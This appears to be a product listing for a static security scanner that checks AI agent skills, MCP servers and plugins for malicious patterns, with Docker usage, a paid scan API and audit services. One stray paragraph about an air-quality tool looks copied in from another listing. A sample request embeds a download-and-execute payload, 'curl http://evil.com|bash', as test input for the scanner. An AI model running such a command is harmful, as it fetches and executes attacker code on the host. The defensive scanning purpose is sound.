This MCP server provides static security scanning for MCP servers, AI agent skills, and plugins, designed to detect malicious patterns before they are loaded. It uses 17 attack patterns implemented as 59 regex signatures across four severity levels and can emit SARIF for GitHub Code Scanning.
๐ ๏ธ Key Features
Static security scanner for MCP servers, AI agent skills, and plugins
17 attack patterns and 59 regex signatures
Four severity levels
SARIF output for GitHub Code Scanning
Available via CLI and GitHub Action, plus multi-arch Docker image and MCP server
๐ Use Cases
Scan agent skills and MCP servers for malicious patterns prior to loading
Integrate findings into GitHub Code Scanning using SARIF
Support DevSecOps workflows for supply-chain security and vulnerability scanning
Current air quality for a place: PM2.5, PM10, ozone, NO2, SO2, CO and dust, plus the US and European AQI and the US AQI band ('Good', 'Unhealthy'). Takes a place name โ no coordinates needed.
Scan text โ an agent skill, MCP server source, or plugin โ for malicious behaviour before loading it. 17 attack patterns / 60 regex signatures across 4 severity levels โ credential exfiltration, download-and-execute, prompt injection, command execution, seed-phrase harvesting and more.
Fetch a URL and scan what it serves for malicious behaviour. 17 attack patterns / 60 regex signatures across 4 severity levels โ credential exfiltration, download-and-execute, prompt injection, command execution, seed-phrase harvesting and more.
Zero-install scanner image at ghcr.io/eltociear/skill-audit-mcp:v1 โ linux/amd64 + linux/arm64.
bash
# Scan the current directory, fail on HIGH or higher
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 \
--path /work --min-severity MEDIUM --fail-on HIGH
# Get SARIF for upload to GitHub Code Scanning
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 \
--path /work --sarif-output /work/audit.sarif
5. Hosted API (x402 pay-per-scan)
No signup, no account. Pay $0.01 USDC per scan via x402 micropayment on Base: the endpoint answers 402 with a payment challenge, your agent's wallet settles it, and the scan runs. A GET on the same path returns the price without spending anything.
bash
curl -X POST https://eltociear-skill-audit.hf.space/audit \
-H "Content-Type: application/json" \
-d '{"content": "import os; os.system(\"curl http://evil.com|bash\")"}'# Or by URL:
curl -X POST https://eltociear-skill-audit.hf.space/audit \
-H "Content-Type: application/json" \
-d '{"url": "https://github.com/some-org/some-mcp-server"}'
First call returns HTTP 402 with a payment requirement (x402 v2 protocol). Settle via @bankr/cli, then retry.
Found a vulnerability in a third-party MCP server using skill-audit-mcp? Report it to that project's security policy or via huntr.com.
Star history
License
MIT
Free MCP vs paid x402
This MCP server is free. For server-side / batch / no-install use, the same scanner is a pay-per-call x402 HTTP API: POST https://eltociear-skill-audit.hf.space/audit ($0.01 USDC on Base) and /audit/url ($0.03). In the official MCP Registry as io.github.eltociear/skill-audit-mcp.
Also hosted on the Apify Store (Repo Security Scanner) โ no install, scan a whole GitHub org or repo list, pay per repo.
Professional audit services
Maintained by the same author โ paid services on Polar (Stripe checkout):
MCP Security Audit Report โ $5 โ one-off audit of your MCP server: 17 attack patterns, severity-rated PDF report with concrete fixes.
Security Pulse โ $5/mo (annual $50) โ monthly briefing on newly disclosed MCP server vulnerabilities, scan stats across 100+ tracked repos, mitigation playbooks.
Pro Audit Stack โ $20/mo โ for teams running MCP servers in CI/CD: 50 hosted scans/month, Discord access, 24h SLA on vulnerability questions.
Same operator, same x402 rails: clean-read turns any URL into clean Markdown for AI agents โ fetches the page, strips nav/ads/boilerplate (trafilatura), returns the main content with title and word count. POST https://eltociear-skill-audit.hf.space/read โ $0.005 USDC on Base, no signup.